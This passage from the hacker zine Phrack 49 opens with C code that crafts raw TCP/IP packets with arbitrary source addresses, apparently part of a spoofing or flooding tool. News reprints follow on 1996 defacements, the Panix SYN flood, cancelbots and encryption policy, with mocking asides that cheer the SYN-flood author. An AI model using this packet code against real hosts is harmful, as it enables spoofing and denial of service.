	     gettimeofday(&waitsend,NULL);

	     FD_ZERO(&wset);
	     
	     printf("
");
	     
	     if ((++sendthreshold > STCP_THRESHOLD) && (slowfactor))
	       {
		  printf("

 -- THRESHOLD CROSSED - SLOWING UP SENDS

");
		  usecdelay *= slowfactor;
	          sendthreshold = 0;
	       }
	  }
     }
}

     

/*
 * tcp_pkt.c
 * 
 * routines for creating TCP packets, and sending them into sockets.
 *
 * (version 0.3)
 *
 * 
 * BUGFIX: - it seems like the TCP pseudo header checksum was
 *           acting up in serveral cases.
 * ADDED : - HEXDUMP macro. 
 *         - packet dump handling
 */

/* remove inlines for smaller size but lower speed */

#include <netinet/in.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

#define IPHDRSIZE sizeof(struct iphdr)
#define TCPHDRSIZE sizeof(struct tcphdr)
#define PSEUDOHDRSIZE sizeof(struct pseudohdr)

/* ********** RIPPED CODE START ******************************** */

/*
 * in_cksum --
 *  Checksum routine for Internet Protocol family headers (C Version)
 */
unsigned short in_cksum(addr, len)
    u_short *addr;
    int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
 
    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }
 
    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }
 
    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */
    sum += (sum >> 16);                   /* add carry */
    answer = ~sum;                        /* truncate to 16 bits */
    return(answer);
}

/* ********** RIPPED CODE END ******************************** */

/*
 * HEXDUMP()
 * 
 * not too much to explain
 */
inline void HEXDUMP(unsigned len, unsigned char *data) 
{ 
   unsigned i;
   for (i=0;i<len;i++) printf("%02X%c",*(data+i),((i+1)%16) ? ' ' : '
');
}

/*
 * tcpip_send()
 * 
 * sends a totally customized datagram with TCP/IP headers. 
 */

inline int tcpip_send(int      socket,
	              struct sockaddr_in *address,
		      unsigned long s_addr,
		      unsigned long t_addr,
		      unsigned      s_port,
		      unsigned      t_port,
		      unsigned char tcpflags,
		      unsigned long seq,
		      unsigned long ack,
                      unsigned      win,
		      char          *datagram,
		      unsigned      datasize)
     {
	
        struct pseudohdr  {
           unsigned long saddr;
	   unsigned long daddr;
	   char useless;
	   unsigned char protocol;
	   unsigned int tcplength;
	};

	unsigned char packet[2048];
	struct iphdr        *ip     = (struct iphdr *)packet;
	struct tcphdr       *tcp    = (struct tcphdr *)(packet+IPHDRSIZE);
	struct pseudohdr    *pseudo = (struct pseudohdr *)(packet+IPHDRSIZE-PSEUDOHDRSIZE);
        unsigned char       *data   = (unsigned char *)(packet+IPHDRSIZE+TCPHDRSIZE);      

	/*
	 * The above casts will save us a lot of memcpy's later.
         * The pseudo-header makes this way become easier than a union.
         */
	
	memcpy(data,datagram,datasize);
	memset(packet,0,TCPHDRSIZE+IPHDRSIZE);

	/* The data is in place, all headers are zeroed. */
	
        pseudo->saddr = s_addr;
	pseudo->daddr = t_addr;
	pseudo->protocol = IPPROTO_TCP;   
	pseudo->tcplength = htons(TCPHDRSIZE+datasize);  
	
        /* The TCP pseudo-header was created. */
       
	tcp->th_sport   = htons(s_port);
	tcp->th_dport   = htons(t_port);
	tcp->th_off     = 5;          /* 20 bytes, (no options) */
	tcp->th_flags   = tcpflags;
	tcp->th_seq     = htonl(seq);
	tcp->th_ack     = htonl(ack);
        tcp->th_win     = htons(win); /* we don't need any bigger, I guess. */
	
	/* The necessary TCP header fields are set. */
	
	tcp->th_sum = in_cksum(pseudo,PSEUDOHDRSIZE+TCPHDRSIZE+datasize);
	
	memset(packet,0,IPHDRSIZE); 
	/* The pseudo-header is wiped to clear the IP header fields */
	
	ip->saddr    = s_addr;
	ip->daddr    = t_addr;
        ip->version  = 4;
	ip->ihl      = 5;
	ip->ttl      = 255;
        ip->id       = random()%1996;
	ip->protocol = IPPROTO_TCP; /* should be 6 */
        ip->tot_len  = htons(IPHDRSIZE + TCPHDRSIZE + datasize);
        ip->check    = in_cksum((char *)packet,IPHDRSIZE);
        
	/* The IP header is intact. The packet is ready. */

#ifdef TCP_PKT_DEBUG
	printf("Packet ready. Dump: 
");
#ifdef TCP_PKT_DEBUG_DATA
	HEXDUMP(IPHDRSIZE+TCPHDRSIZE+datasize,packet);
#else
	HEXDUMP(IPHDRSIZE+TCPHDRSIZE,packet);
#endif
        printf("
");
#endif

	return sendto(socket, packet, IPHDRSIZE+TCPHDRSIZE+datasize, 0, (struct sockaddr *)address, sizeof(struct sockaddr));
		
	/* And off into the raw socket it goes. */
     }
	   
	


/*
 * resolve.c
 * 
 * resolves an internet text address into (struct sockaddr_in).
 *
 * CHANGES: 1. added the RESOLVE_QUIET preprocessor conditions. Jan 1996
 *          2. added resolve_rns() to always provide both name/ip. March 1996
 */

#include <sys/types.h>
#include <string.h>
#include <netdb.h>
#include <stdio.h>
#include <netinet/in.h>

int resolve( const char *name, struct sockaddr_in *addr, int port )
     {
	struct hostent *host;
	
	/* clear everything in case I forget something */
	bzero(addr,sizeof(struct sockaddr_in));
	
	if (( host = gethostbyname(name) ) == NULL )  {
#ifndef RESOLVE_QUIET
	   fprintf(stderr,"unable to resolve host "%s" -- ",name);
	   perror("");
#endif
	   return -1;
	}
	 
	addr->sin_family = host->h_addrtype;
	memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
	addr->sin_port = htons(port);
     
        return 0;
     }

int resolve_rns( char *name , unsigned long addr )
     {
	struct hostent *host;
        unsigned long address;
	
	address = addr;
	host = gethostbyaddr((char *)&address,4,AF_INET);

      	if (!host)  {
#ifndef RESOLVE_QUIET
	   fprintf(stderr,"unable to resolve host "%s" -- ",inet_ntoa(addr));
	   perror("");
#endif

	   return -1;
	}


	strcpy(name,host->h_name);
	
        return 0;
     }
	

unsigned long addr_to_ulong(struct sockaddr_in *addr)
     {
	return addr->sin_addr.s_addr;
     }



--------------------------------------------------------------------------------


                              .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine

                                    16 of 16


              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN                  Issue 49                   PWN
              PWN                                             PWN
              PWN             Compiled by DisordeR            PWN
              PWN                                             PWN
              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


Phrack World News #49 -- Index

01. CIA attacked, pulls plug on Internet site
02. Letter From Senator Patrick Leahy (D-VT) on Encryption
03. Java Black Widows - Sun Declares War
04. Jacking in from the "Smoked Filled Room" Port
05. Panix Attack
06. Massive Usenet Cancels
07. Mitnick Faces 25 More Federal Counts of Computer Hacking
08. Hacker is freed but he's banned from computers
09. Computer Hacker Severely Beaten after Criticizing Prison Conditions
    Target of Campaign by U.S. Secret Service
10. Bernie S. Released!
11. <The Squidge Busted>
12. School Hires Student to Hack Into Computers
13. Paranoia and Brit Hackers Fuel Infowar Craze in Spy Agencies
14. Hackers Find Cheap Scotland Yard Phone Connection
15. U.S. Official Warns OF "Electronic Pearl Harbor"
16. Suit Challenges State's Restraint of the Internet Via AP
17. U.S. Government Plans Computer Emergency Response Team
18. Hackers $50K challenge to break Net security system
19. Criminal cult begins PGP crack attempt
20. Hackers Bombard Internet
21. Crypto Mission Creep
22. Hacker posts nudes on court's Web pages
23. Hacking Into Piracy
24. Revealing Intel's Secrets
25. Internet Boom Puts Home PCs At Risk Of Hackers
26. Computer hacker Mitnick pleads innocent
27. Hackers Destroy Evidence of Gulf War Chemical/Biological Weapons
28. Criminals Slip Through The Net


[=-------------------------------------------------------------------------=]

title: CIA attacked, pulls plug on Internet site
author: unknown
source: Reuter

WASHINGTON (Reuter) - The Central Intelligence Agency, that bastion of
spy technology and computer wizardry, pulled the plug on its World
Wide Web site on the Internet Thursday after a hacker broke in and
replaced it with a crude parody.

CIA officials said their vandalized homepage -- altered to read
"Welcome to the Central Stupidity Agency" -- was in no way linked to
any mainframe computers containing classified national security
information.

[* Excuse me for a minute while my erection goes down. *]

The site was tampered with Wednesday evening and the CIA closed it
Thursday morning while a task force looked into the security breach,
CIA spokeswoman Jane Heishman said. Part of the hacker's text read
"Stop Lying."

"It's definitely a hacker" who pierced the system's security, she
said. "The agency has formed a task force to look into what happend
and how to prevent it."

[* No shit?! It was a hacker that did that? *]

The CIA web site (http://www.odci.gov/cia) showcases unclassified
information including spy agency press releases, officials' speeches,
historical rundowns and the CIA's World Fact Book, a standard
reference work.

The cyber-attack matched one that forced the Justice Department to
close its Web site last month after hackers inserted a swastika and
picture of Adolph Hitler.  The penetration of the CIA homepage
highlighted the vulnerability of Internet sites designed to attract
the public and drove home the need for multiple layers of security.

"You want people to visit, you want them to interact, but you don't
want them to leave anything behind," said Jon Englund of the
Information Technology Association of America, a trade group of
leading software and telecommunications firms.

[=-------------------------------------------------------------------------=]

From: Senator_Leahy@LEAHY.SENATE.GOV
Date: Thu, 02 May 96 12:04:07 EST

-----BEGIN PGP SIGNED MESSAGE-----

     LETTER FROM SENATOR PATRICK LEAHY (D-VT) ON ENCRYPTION

May 2, 1996

Dear Friends:

Today, a bipartisan group of Senators has joined me in supporting
legislation to encourage the development and use of strong,
privacy-enhancing technologies for the Internet by rolling back
the out-dated restrictions on the export of strong cryptography.

In an effort to demonstrate one of the more practical uses of
encryption technology (and so that you all know this message
actually came from me), I have signed this message using a
digital signature generated by the popular encryption program
PGP.  I am proud to be the first member of Congress to utilize
encryption and digital signatures to post a message to the
Internet.

[* The first?! We're doomed!! *]

As a fellow Internet user, I care deeply about protecting
individual privacy and encouraging the development of the Net as
a secure and trusted communications medium.  I do not need to
tell you that current export restrictions only allow American
companies to export primarily weak encryption technology.  The
current strength of encryption the U.S. government will allow out
of the country is so weak that, according to a January 1996 study
conducted by world-renowned cryptographers, a pedestrian hacker
can crack the codes in a matter of hours!  A foreign intelligence
agency can crack the current 40-bit codes in seconds.

[* That should read "As a fellow Internet user ..who doesn't read
   his own mail... *]

Perhaps more importantly, the increasing use of the Internet and
similar interactive communications technologies by Americans to
obtain critical medical services, to conduct business, to be
entertained and communicate with their friends, raises special
concerns about the privacy and confidentiality of those
communications.  I have long been concerned about these issues,
and have worked over the past decade to protect privacy and
security for our wire and electronic communications.  Encryption
technology provides an effective way to ensure that only the
people we choose can read our communications.

I have read horror stories sent to me over the Internet about how
human rights groups in the Balkans have had their computers
confiscated during raids by security police seeking to find out
the identities of people who have complained about abuses.
Thanks to PGP, the encrypted files were undecipherable by the
police and the names of the people who entrusted their lives to
the human rights groups were safe.

The new bill, called the "Promotion of Commerce On-Line in the
Digital Era (PRO-CODE) Act of 1996," would:

     o    bar any government-mandated use of any particular
     encryption system, including key escrow systems and affirm
     the right of American citizens to use whatever form of
     encryption they choose domestically;

[* Thank you for permission to do that.. even though it is legal already *]

     o    loosen export restrictions on encryption products so
     that American companies are able to export any generally
     available or mass market encryption products without
     obtaining government approval; and

[* Loosen? Why not abolish? *]

     o    limit the authority of the federal government to set
     standards for encryption products used by businesses and
     individuals, particularly standards which result in products
     with limited key lengths and key escrow.

This is the second encryption bill I have introduced with Senator
Burns and other congressional colleagues this year. Both bills
call for an overhaul of this country's export restrictions on
encryption, and, if enacted, would quickly result in the
widespread availability of strong, privacy protecting
technologies. Both bills also prohibit a government-mandated key
escrow encryption system.  While PRO-CODE would limit the
authority of the Commerce Department to set encryption standards
for use by private individuals and businesses, the first bill we
introduced, called the "Encrypted Communications Privacy Act",
S.1587, would set up stringent procedures for law enforcement to
follow to obtain decoding keys or decryption assistance to read
the plaintext of encrypted communications obtained under court
order or other lawful process.

It is clear that the current policy towards encryption exports is
hopelessly outdated, and fails to account for the real needs of
individuals and businesses in the global marketplace.  Encryption
expert Matt Blaze, in a recent letter to me, noted that current
U.S. regulations governing the use and export of encryption are
having a "deleterious effect ... on our country's ability to
develop a reliable and trustworthy information infrastructure."
The time is right for Congress to take steps to put our national
encryption policy on the right course.

I am looking forward to hearing from you on this important issue.
Throughout the course of the recent debate on the Communications
Decency Act, the input from Internet users was very valuable to
me and some of my Senate colleagues.

You can find out more about the issue at my World Wide Web home
page (http://www.leahy.senate.gov/) and at the Encryption Policy
Resource Page (http://www.crypto.com/). Over the coming months, I
look forward to the help of the Net community in convincing other
Members of Congress and the Administration of the need to reform
our nation's cryptography policy.

Sincerely,

Patrick Leahy
United States Senator

[=-------------------------------------------------------------------------=]

title: JAVA BLACK WIDOWS - SUN DECLARES WAR
author: unknown
from: staff@hpp.com


Sun Microsystems' has declared war on Black Widow Java
applets on the Web. This is the message from Sun in response
to an extensive Online Business Consultant (OBC/May 96)
investigation into Java security.

OBC's investigation and report was prompted after renowned
academics, scientists and hackers announced Java applets
downloaded from the WWW presented grave security risks for
users. Java Black Widow applets are hostile, malicious traps set
by cyberthugs out to snare surfing prey, using Java as their technology.
OBC received a deluge of letters asking for facts after OBC
announced a group of scientists from Princeton University, Drew
Dean, Edward Felten and Dan Wallach, published a paper declaring
"The Java system in its current form cannot easily be made secure."
The paper can be retrieved at
http://www.cs.princeton.edu/sip/pub/secure96.html.

Further probing by OBC found that innocent surfers on the Web who
download Java applets into Netscape's Navigator and Sun's
HotJava browser, risk having "hostile" applets interfere with their
computers (consuming RAM and CPU cycles). It was also discovered
applets could connect to a third party on the Internet and, without the
PC owner's knowledge, upload sensitive information from the user's
computer. Even the most sophisticated firewalls can be penetrated . . .
"because the attack is launched from behind the firewall," said the
Princeton scientists.

One reader said, "I had no idea that it was possible to stumble on
Web sites that could launch an attack on a browser."  Another said,
"If this is allowed to get out of hand it will drive people away from the
Web. Sun must allay fears."

[* Faster connections if people are driven from the web.. hmm... :) *]

The response to the Home Page Press hostile applet survey led to the
analogy of Black Widow; that the Web was a dangerous place where
"black widows" lurked to snare innocent surfers. As a result the
Princeton group and OBC recommended users should "switch off"
Java support in their Netscape Navigator browsers. OBC felt that Sun
and Netscape had still to come clean on the security issues. But
according to Netscape's Product Manager, Platform, Steve Thomas,
"Netscape wishes to make it clear that all known security problems with
the Navigator Java and JavaScript environment are fixed in Navigator
version 2.02."

However, to date, Netscape has not answered OBC's direct questions
regarding a patch for its earlier versions of Navigator that supported
Java . . . the equivalent of a product recall in the 3D world. Netscape
admits that flaws in its browsers from version 2.00 upwards were
related to the Java security problems, but these browsers are still in use
and can be bought from stores such as CompUSA and Cosco. A floor
manager at CompUSA, who asked not to be named, said "its news to
him that we are selling defective software. The Navigator walks off our
floor at $34 a pop."

OBC advised Netscape the defective software was still selling at
software outlets around the world and asked Netscape what action was
going to be taken in this regard. Netscape has come under fire recently
for its policy of not releasing patches to software defects; but rather
forcing users to download new versions. Users report this task to be a
huge waste of time and resources because each download consists of
several Mbytes. As such defective Navigators don't get patched.

OBC also interviewed Sun's JavaSoft security guru, Ms. Marianne Mueller,
who said "we are taking security very seriously and working on it very
hard." Mueller said the tenet that Java had to be re-written from scratch or
scrapped "is an oversimplification of the challenge of running executable
content safely on the web. Security is hard and subtle, and trying to build
a secure "sandbox" [paradigm] for running untrusted downloaded applets
on the web is hard."

Ms. Mueller says Sun, together with their JavaSoft (Sun's Java division)
partners, have proposed a "sandbox model" for security in which "we
define a set of policies that restrict what applets can and cannot do---these
are the boundaries of the sandbox. We implement boundary checks---when
an applet tries to cross the boundary, we check whether or not it's allowed
to. If it's allowed to, then the applet is allowed on its way. If not, the
system throws a security exception.

"The 'deciding whether or not to allow the boundary to be crossed' is the
research area that I believe the Princeton people are working on," said
Mueller. "One way to allow applets additional flexibility is if the applet
is signed (for example, has a digital signature so that the identity of the
applet's distributor can be verified via a Certificate Authority) then allow
the applet more flexibility.

 "There are two approaches: One approach is to let the signed applet
do anything. A second approach is to do something more complex and
more subtle, and only allow the applet particular specified capabilities.
Expressing and granting capabilities can be done in a variety of ways.

"Denial of service is traditionally considered one of the hardest security
problems, from a practical point of view. As [Java's creator] James
Gosling says, it's hard to tell the difference between an MPEG
decompressor and a hostile applet that consumes too many resources!
But recognizing the difficulty of the problem is not the same as 'passing
the buck.' We are working on ways to better monitor and control the
use (or abuse) of resources by Java classes. We could try to enforce
some resource limits, for example. These are things we are investigating.

"In addition, we could put mechanisms in place so that user interface
people (like people who do Web browsers) could add 'applet monitors'
so that browser users could at least see what is running in their browser,
and kill off stray applets. This kind of user interface friendliness (letting
a user kill of an applet) is only useful if the applet hasn't already grabbed
all the resources, of course."

The experts don't believe that the problem of black widows and hostile
applets is going to go away in a hurry. In fact it may get worse. The
hackers believe that when Microsoft releases Internet Explorer 3.00 with
support for Java, Visual Basic scripting and the added power of its
ActiveX technology, the security problem will become worse.

"There is opportunity for abuse, and it will become an enormous
problem," said Stephen Cobb, Director of Special Projects for the
National Computer Security Association (NCSA). "For example, OLE
technology from Microsoft [ActiveX] has even deeper access to a
computer than Java does."

JavaSoft's security guru Mueller agreed on the abuse issue: "It's going
to be a process of education for people to understand the difference
between a rude applet, and a serious security bug, and a theoretical
security bug, and an inconsequential security-related bug. In the case of
hostile applets, people will learn about nasty/rude applet pages, and
those pages won't be visited. I understand that new users of the Web
often feel they don't know where they're going when they point and click,
but people do get a good feel for how it works, pretty quickly, and I
actually think most users of the Web can deal with the knowledge that
not every page on the web is necessarily one they'd want to visit.
Security on the web in some sense isn't all that different from security
in ordinary life. At some level, common sense does come into play.

"Many people feel that Java is a good tool for building more secure
applications. I like to say that Java raises the bar for security on the
Internet. We're trying to do something that is not necessarily easy, but
that doesn't mean it isn't worth trying to do. In fact it may be worth
trying to do because it isn't easy.  People are interested in seeing the
software industry evolve towards more robust software---that's the
feedback I get from folks on the Net."

# # #

The report above may be reprinted with credit provided as follows:

Home Page Press, Inc.,  http://www.hpp.com  and Online Business ConsultantOE
Please refer to the HPP Web site for additional information about Java and
OBC.

[=-------------------------------------------------------------------------=]

title: Jacking in from the "Smoked Filled Room" Port
author: "Brock N. Meeks" <brock@well.com>
source: CyberWire Dispatch // September // Copyright (c) 1996 //

Washington, DC -- Federal provisions funding the digital telephony bill
and roving wiretaps, surgically removed earlier this year from an
anti-terrorism bill, have quietly been wedged into a $600 billion
omnibus spending bill.

The bill creates a Justice Department "telecommunications carrier
compliance fund" to pay for the provisions called for in the digital
telephony bill, formally known as the Communications Assistance in Law
Enforcement Act (CALEA).  In reality, this is a slush fund.

Congress originally budgeted $500 million for CALEA, far short of the
billions actually needed to build in instant wiretap capabilities into
America's telephone, cable, cellular and PCS networks.  This bill now
approves a slush fund of pooled dollars from the budgets of "any agency"
with "law enforcement, national security or intelligence
responsibilities."  That means the FBI, CIA, NSA and DEA, among others,
will now have a vested interest in how the majority of your
communications are tapped.

The spending bill also provides for "multipoint wiretaps."  This is the
tricked up code phase for what amounts to roving wiretaps.  Where the
FBI can only tap one phone at a time in conjunction with an
investigation, it now wants the ability to "follow" a conversation from
phone to phone; meaning that if your neighbor is under investigation and
happens to use your phone for some reason, your phone gets tapped.    It
also means that the FBI can tap public pay phones... think about that
next time you call 1-800-COLLECT.

In addition, all the public and congressional accountability provisions
for how CALEA money was spent, which were in the original House version
(H.R. 3814), got torpedoed in the Senate Appropriations Committee.

Provisions stripped out by the Senate:

-- GONE: Money isn't to be spent unless an implementation plan is sent
to each member of the Judiciary Committee and Appropriations committees.

-- GONE:  Requirement that the FBI provide public details of how its new
wiretap plan exceeds or differs from current capabilities.

-- GONE:  Report on the "actual and maximum number of simultaneous
surveillance/intercepts" the FBI expects.   The FBI ran into a fire storm
earlier this year when it botched its long overdue report that said it
wanted the capability to tap one out of every 100 phones
*simultaneously*.   Now, thanks to this funding bill, rather than having
to defend that request, it doesn't have to say shit.

-- GONE:  Complete estimate of the full costs of deploying and
developing the digital wiretapping plan.

-- GONE:  An annual report to Congress "specifically detailing" how all
taxpayer money -- YOUR money -- is spent to carry out these new wiretap
provisions.

"No matter what side you come down on this (digital wiretapping) issue,
the stakes for democracy are that we need to have public accountability,"
said Jerry Berman, executive director of the Center for Democracy and
Technology.

Although it appeared that no one in congress had the balls to take on
the issue, one stalwart has stepped forward, Rep. Bob Barr (R-Ga.).  He
has succeeded in getting some of the accountability provisions back into
the bill, according to a Barr staffer.  But the fight couldn't have been
an easy one.   The FBI has worked congress relentlessly in an effort to
skirt the original reporting and implementation requirements as outlined
in CALEA.  Further, Barr isn't exactly on the FBI's Christmas card list.
Last year it was primarily Barr who scotched the funding for CALEA
during the 104th Congress' first session.

But Barr has won again.  He has, with backing from the Senate, succeeded
in *putting back* the requirement that the FBI must justify all CALEA
expenditures to the Judiciary Committee.   Further, the implementation
plan, "though somewhat modified" will "still have some punch," Barr's
staffer assured me.  That includes making the FBI report on its
expected capacities and capabilities for digital wiretapping. In other
words, the FBI won't be able to "cook the books" on the wiretap figures
in secret.  Barr also was successful in making the Justice Department
submit an annual report detailing its CALEA spending to Congress.

However, the funding for digital wiretaps remains.  Stuffing the funding
measures into a huge omnibus spending bill almost certainly assures its
passage. Congress is twitchy now, anxious to leave.  They are chomping
at the bit, sensing the end of the 104th Congress' tortured run as the
legislative calender is due to run out sometime early next week.  Then
they will all literally race from Capitol Hill at the final gavel,
heading for the parking lot, jumping in their cars like stock car
drivers as they make a made dash for National Airport to return to their
home districts in an effort to campaign for another term in the loopy
world of national politics.

Congress is "going to try to sneak this (spending bill) through the back
door in the middle of the night," says Leslie Hagan, legislative
director for the National Association of Criminal Defense Lawyers.  She
calls this a "worst case scenario" that is "particularly dangerous"
because the "deliberative legislative process is short-ciricutied."

Such matters as wiretapping deserve to be aired in the full sunlight of
congressional hearings, not stuffed into an 11th hour spending bill.
This is legislative cowardice.  Sadly, it will most likely succeed.

And through this all, the Net sits mute.

Unlike a few months ago, on the shameful day the Net cried "wolf" over
these same provisions, mindlessly flooding congressional switchboards
and any Email box within keyboard reach, despite the fact that the
funding provisions had been already been stripped from the
anti-terrorism bill, there has been no hue-and-cry about these most
recent moves.

Yes, some groups, such as the ACLU, EPIC and the Center for Democracy
and Technology have been working the congressional back channels,
buzzing around the frenzied legislators like crazed gnats.

But why haven't we heard about all this before now?  Why has  this bill
come down to the wire without the now expected flurry of "alerts"
"bulletins" and other assorted red-flag waving by our esteemed Net
guardians?  Barr's had his ass hanging in the wind, fighting FBI
Director Louis "Teflon" Freeh;  he could have used some political cover
from the cyberspace community.  Yet, if he'd gone to that digital well,
he'd have found only the echo of his own voice.

And while the efforts of Rep. Barr are encouraging, it's anything from a
done deal.  "As long as the door is cracked... there is room for
mischief," said Barr's staffer.   Meaning, until the bill is reported
and voted on, some snapperhead congressman could fuck up the process yet
again.

We all caught a bit of a reprieve here, but I wouldn't sleep well.  This
community still has a lot to learn about the Washington boneyard.
Personally, I'm a little tired of getting beat up at every turn.  Muscle
up, folks, the fight doesn't get any easier.

Meeks out...

Declan McCullagh <declan@well.com> contributed to this report.

[=-------------------------------------------------------------------------=]

title: Panix Attack
author: Joshua Quittner
source: Time Magazine - September 30, 1996 Volume 148, No. 16
   
It was Friday night, and Alexis Rosen was about to leave work when one
of his computers sent him a piece of E-mail. If this had been the
movies, the message would have been presaged by something
dramatic--the woo-ga sound of a submarine diving into combat, say. But
of course it wasn't. This was a line of dry text automatically
generated by one of the machines that guard his network. It said
simply, "The mail servers are down." The alert told Rosen that his
6,000 clients were now unable to receive E-mail.

Rosen, 30, is a cool customer, not the type to go into cardiac arrest
when his mail server crashes. He is the co-founder of Panix, the
oldest and best-known Internet service provider in Manhattan. Years
before the Net became a cereal-box buzz word, Rosen would let people
connect to Panix free, or for only a few dollars a month, just
because--well, because that was the culture of the time. Rosen has
handled plenty of mail outages, so on this occasion he simply rolled
up his sleeves and set to work, fingers clacking out a flamenco on the
keyboard, looking for the cause of the glitch. What he uncovered sent
a chill down his spine--and has rippled across the Net ever since,
like a rumor of doom. Someone, or something, was sending at the rate
of 210 a second the one kind of message his computer was obliged to
answer. As long as the siege continued--and it went on for
weeks--Rosen had to work day and night to keep from being overwhelmed
by a cascade of incoming garbage.

It was the dread "syn flood," a relatively simple but utterly
effective means for shutting down an Internet service provider--or,
for that matter, anyone else on the Net. After Panix went public with
its story two weeks ago, dozens of online services and companies
acknowledged being hit by similar "denial of service" attacks. As of
late last week, seven companies were still under furious assault.

None of the victims have anything in common, leading investigators to
suspect that the attacks may stem from the same source: a pair of
how-to articles that appeared two months ago in 2600 and Phrack, two
journals that cater to neophyte hackers. Phrack's article was written
by a 23-year-old editor known as daemon9. He also crafted the code for
an easy-to-run, menu-driven, syn-flood program, suitable for use by
any "kewl dewd" with access to the Internet. "Someone had to do it,"
wrote daemon9.

[* WooWoo! Go Route! *]

That gets to the core of what may be the Net's biggest problem these
days: too many powerful software tools in the hands of people who
aren't smart enough to build their own--or to use them wisely. Real
hackers may be clever and prankish, but their first rule is to do no
serious harm. Whoever is clobbering independent operators like Panix
has as much to do with hacking as celebrity stalkers have to do with
cinematography. Another of the victims was the Voters
Telecommunications Watch, a nonprofit group that promotes free speech
online. "Going after them was like going after the little old lady who
helps people in the neighborhood and bashing her with a lead pipe,"
says Rosen.

[* Gee. Is that to say that if you can't write your own operating system
   that you shouldn't have it or that it is a big problem? If so, poor
   Microsoft... *]

Rosen was eventually able to repulse the attack; now he'd like to
confront his attacker. Since some of these Netwits don't seem to know
enough to wipe off their digital fingerprints, he may get his wish.

[* Wow, they did it for two weeks without getting caught. Two weeks of
   24/7 abuse toward this ISP, and now he thinks he can track them down? *]

[=-------------------------------------------------------------------------=]

title: none
author: Rory J. O'Connor
source: Knight-Ridder Newspapers

WASHINGTON -- Vandals swept through the Internet last weekend, wiping
clean dozens of public bulletin boards used by groups of Jews, Muslims,
feminists and homosexuals, among others.

In one of the most widespread attacks on the international computer
network, the programs automatically erased copies of more than 27,000
messages from thousands of servers, before operators stopped the
damage.

The identity of those responsible for launching the apparent hate
attacks -- some of the programs were titled "fagcancel" and "kikecancel" 
-- is unknown.

The incident further illustrates the shaky security foundation of the
Internet, which has mushroomed from academic research tool to
international communications medium in just three years.

And it raised the ire of many Internet users furious at the ease with
which a user can erase someone else's words from worldwide discussion
groups, known as Usenet newsgroups, in a matter of hours.

"There's nothing you can do as an individual user to prevent someone
from canceling your message," said John Gilmore, a computer security
expert in San Francisco. "We need something added to Usenet's software
that would only allow a cancellation from the originator."

[* Which can then be forged just like fakemail... *]

The incident follows closely three other well-publicized Internet
attacks.

In two cases, hackers altered the World Wide Web home pages of the
Justice Department and the CIA, apparently as political protests. In
the third, a hacker overloaded the computers of an Internet service
provider called Panix with hordes of phony requests for a connection,
thus denying use of the service to legitimate users.

The latest attacks -- called cancelbots -- were launched sometime over
the weekend from a variety of Internet service providers, including
UUNet Technologies in Fairfax, Va., and Netcom Inc. in San Jose,
Calif. One attack was launched from a tiny provider in Tulsa, Okla.,
called Cottage Software, according to its owner, William Brunton.

"The offending user has been terminated and the information has been
turned over to the proper (federal) authorities," Brunton said in a
telephone interview Wednesday. "It's now in their hands."

Legal experts said it's unclear if the attacks constitute a crime
under federal laws such as the Computer Fraud and Abuse Act.

"It's really a difficult issue," said David Sobel, legal counsel of
the Electronic Privacy Information Center in Washington. "Can you
assign value to a newsgroup posting? Because most of the computer
crime statutes assume you're ripping off something of value."

[* Hello? Several statutes don't assume that at all. You can be
   charged with HAVING information and not using it. *]

A spokesman for the FBI in Washington said he was unaware of any
federal investigation of the incident, although it is the agency's
policy not to comment on investigations.

While some of the deleted messages have been restored on certain
servers, where operators have retrieved them from backup copies of
their disks, users of other servers where the messages haven't been
restored will never be able to read them.

The fact that a user can stamp out the words of someone else is an
artifact of the original design of the Internet, begun as a Department
of Defense project in 1969.

The Internet consists of tens of thousands of computers, called
servers, that act as repositories for public messages, private
electronic mail and World Wide Web home pages. Servers throughout the
world are interconnected through telephone lines so they can exchange
information and route messages to the individual users, or clients, of
a given server.

Each server stores a copy of the constantly changing contents of
newsgroups, which function as giant electronic bulletin boards
dedicated to particular subjects. There are thousands of them,
covering everything from particle physics to soap operas.

Any Internet user is free to post a contribution to nearly any
newsgroup, and the posting is rapidly copied from one server to
another, so the contents of a newsgroup are identical on every server.

Almost the only form of control over postings, including their
content, is voluntary adherence to informal behavior rules known as
"netiquette."

The idea of cancelbots originated when the Internet and its newsgroups
were almost exclusively the domain of university and government
scientists and researchers. Their purpose was to allow individuals to
rescind messages they later discovered to contain an error. The action
took the form of an automatic program, itself in the form of a
message, because it would be impossible for an individual to find and
delete every copy of the posting on every Internet server.

But the Usenet software running on servers doesn't verify that the
cancel message actually comes from the person who created the original
posting. All a malicious user need do is replace their actual e-mail
address with that of someone else to fool Usenet into deleting a
message. That counterfeiting is as simple as changing an option in the
browser software most people use to connect to the Internet.

"It's pretty easy. There's no authentication in the Usenet. So anybody
can pretend to be anybody else," Gilmore said.

It takes only slightly more sophistication to create a program that
searches newsgroups for certain keywords, and then issues a cancelbot
for any message that contains them. That is how the weekend attack
took place.

The use of counterfeit cancelbots is not new. The Church of
Scientology, embroiled in a legal dispute with former members, last
year launched cancelbots against the newsgroup postings of the
members. Attorneys for the church claimed the postings violated
copyright laws, because they contained the text of Scientology
teachings normally available only to longtime members who have paid
thousands of dollars.

Net users have also turned false cancelbots against those who violate
a basic rule of netiquette by "spamming" newsgroups -- that is,
posting a message to hundreds or even thousands of newsgroups, usually
commercial in nature and unrelated to the newsgroup topic.

"This technology has been used for both good and evil," Gilmore said.

But an individual launching a wholesale cancelbot attack on postings
because of content is considered a serious violation of netiquette --
although one about which there is little recourse at the moment.

"For everybody who takes the trouble and time to participate on the
